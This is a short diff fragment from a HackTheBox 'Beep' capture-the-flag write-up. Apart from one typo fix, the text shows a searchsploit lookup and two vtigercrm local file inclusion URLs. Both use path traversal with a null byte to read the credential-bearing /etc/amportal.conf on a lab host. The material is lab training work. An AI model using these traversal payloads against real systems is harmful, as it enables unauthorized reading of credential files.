theeldruin/Writeups/hackthebox/beep.md

 searchsploit -x php/webapps/37637.pl
 ![alt text](./img/beep09.PNG?raw=true)

 Ok, it’s another LFI vector, but it give other file as POC.
-Let’s try to read it, you can choode this new url or the old one
+Let’s try to read it, you can choose this new url or the old one
 - https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
 - https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00